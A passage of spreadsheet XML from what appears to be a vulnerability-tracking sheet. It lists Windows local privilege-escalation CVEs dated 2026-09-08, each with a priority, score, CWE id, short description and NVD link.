      <c r="H1294" s="5" t="inlineStr"/>
      <c r="I1294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1294" s="5" t="inlineStr"/>
      <c r="K1294" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1294" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69333</t>
        </is>
      </c>
      <c r="C1295" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1295" s="5" t="inlineStr"/>
      <c r="F1295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1295" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1295" s="5" t="inlineStr"/>
      <c r="I1295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1295" s="5" t="inlineStr"/>
      <c r="K1295" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1295" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69335</t>
        </is>
      </c>
      <c r="C1296" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1296" s="5" t="inlineStr"/>
      <c r="F1296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1296" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1296" s="5" t="inlineStr"/>
      <c r="I1296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1296" s="5" t="inlineStr"/>
      <c r="K1296" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1296" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69341</t>
        </is>
      </c>
      <c r="C1297" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1297" s="5" t="inlineStr"/>
      <c r="F1297" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1297" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1297" s="5" t="inlineStr"/>
      <c r="I1297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1297" s="5" t="inlineStr"/>
      <c r="K1297" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1297" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69362</t>
        </is>
      </c>
      <c r="C1298" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1298" s="5" t="inlineStr"/>
      <c r="F1298" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1298" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1298" s="5" t="inlineStr"/>
      <c r="I1298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1298" s="5" t="inlineStr"/>
      <c r="K1298" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1298" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="C1299" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1299" s="5" t="inlineStr"/>
      <c r="F1299" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1299" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1299" s="5" t="inlineStr"/>
      <c r="I1299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1299" s="5" t="inlineStr"/>
      <c r="K1299" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1299" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69383</t>
        </is>
      </c>
      <c r="C1300" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1300" s="5" t="inlineStr"/>
      <c r="F1300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1300" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1300" s="5" t="inlineStr"/>
      <c r="I1300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1300" s="5" t="inlineStr"/>
      <c r="K1300" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1300" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69385</t>
        </is>
      </c>
      <c r="C1301" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1301" s="5" t="inlineStr"/>
      <c r="F1301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1301" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1301" s="5" t="inlineStr"/>
      <c r="I1301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1301" s="5" t="inlineStr"/>
      <c r="K1301" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1301" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69388</t>
        </is>
      </c>
      <c r="C1302" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1302" s="5" t="inlineStr"/>
      <c r="F1302" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1302" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1302" s="5" t="inlineStr"/>
      <c r="I1302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1302" s="5" t="inlineStr"/>
      <c r="K1302" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1302" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69394</t>
        </is>
      </c>
      <c r="C1303" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1303" s="5" t="inlineStr"/>
      <c r="F1303" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1303" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1303" s="5" t="inlineStr"/>
      <c r="I1303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1303" s="5" t="inlineStr"/>
      <c r="K1303" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1303" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69398</t>
        </is>
      </c>
      <c r="C1304" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1304" s="5" t="inlineStr"/>
      <c r="F1304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1304" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1304" s="5" t="inlineStr"/>
      <c r="I1304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1304" s="5" t="inlineStr"/>
      <c r="K1304" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-415</t>
        </is>
      </c>
      <c r="L1304" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69404</t>
        </is>
      </c>
      <c r="C1305" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1305" s="5" t="inlineStr"/>
      <c r="F1305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1305" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1305" s="5" t="inlineStr"/>
      <c r="I1305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1305" s="5" t="inlineStr"/>
      <c r="K1305" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1305" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69410</t>
        </is>
      </c>
      <c r="C1306" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1306" s="5" t="inlineStr"/>
      <c r="F1306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1306" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1306" s="5" t="inlineStr"/>
      <c r="I1306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1306" s="5" t="inlineStr"/>
      <c r="K1306" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1306" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="C1307" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1307" s="5" t="inlineStr"/>
      <c r="F1307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1307" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1307" s="5" t="inlineStr"/>
      <c r="I1307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1307" s="5" t="inlineStr"/>
      <c r="K1307" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1307" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="C1308" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1308" s="5" t="inlineStr"/>
      <c r="F1308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1308" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1308" s="5" t="inlineStr"/>
      <c r="I1308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1308" s="5" t="inlineStr"/>
      <c r="K1308" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1308" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69430</t>
        </is>
      </c>
      <c r="C1309" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1309" s="5" t="inlineStr"/>
      <c r="F1309" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1309" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1309" s="5" t="inlineStr"/>
      <c r="I1309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1309" s="5" t="inlineStr"/>
      <c r="K1309" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1309" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69440</t>
        </is>
      </c>
      <c r="C1310" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1310" s="5" t="inlineStr"/>
      <c r="F1310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1310" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1310" s="5" t="inlineStr"/>
      <c r="I1310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1310" s="5" t="inlineStr"/>
      <c r="K1310" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1310" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M1310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69441</t>
        </is>
      </c>
      <c r="C1311" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1311" s="5" t="inlineStr"/>
      <c r="F1311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1311" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1311" s="5" t="inlineStr"/>
      <c r="I1311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1311" s="5" t="inlineStr"/>
      <c r="K1311" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1311" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69448</t>
        </is>
      </c>
      <c r="C1312" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1312" s="5" t="inlineStr"/>
      <c r="F1312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1312" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1312" s="5" t="inlineStr"/>
      <c r="I1312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1312" s="5" t="inlineStr"/>
      <c r="K1312" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1312" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="C1313" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1313" s="5" t="inlineStr"/>
      <c r="F1313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1313" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1313" s="5" t="inlineStr"/>
      <c r="I1313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1313" s="5" t="inlineStr"/>
      <c r="K1313" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1313" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M1313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69468</t>
        </is>
      </c>
      <c r="C1314" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1314" s="5" t="inlineStr"/>
      <c r="F1314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1314" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1314" s="5" t="inlineStr"/>
      <c r="I1314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1314" s="5" t="inlineStr"/>
      <c r="K1314" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1314" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69470</t>
        </is>
      </c>
      <c r="C1315" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1315" s="5" t="inlineStr"/>
      <c r="F1315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1315" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1315" s="5" t="inlineStr"/>
      <c r="I1315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1315" s="5" t="inlineStr"/>
      <c r="K1315" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1315" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="C1316" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1316" s="5" t="inlineStr"/>
      <c r="F1316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1316" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1316" s="5" t="inlineStr"/>
      <c r="I1316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1316" s="5" t="inlineStr"/>
      <c r="K1316" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1316" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="C1317" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1317" s="5" t="inlineStr"/>
      <c r="F1317" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1317" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1317" s="5" t="inlineStr"/>
      <c r="I1317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1317" s="5" t="inlineStr"/>
      <c r="K1317" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1317" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69488</t>
        </is>
      </c>
      <c r="C1318" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1318" s="5" t="inlineStr"/>
      <c r="F1318" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1318" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1318" s="5" t="inlineStr"/>
      <c r="I1318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1318" s="5" t="inlineStr"/>
      <c r="K1318" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1318" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t>
        </is>
      </c>
    </row>
    <row r="1319">
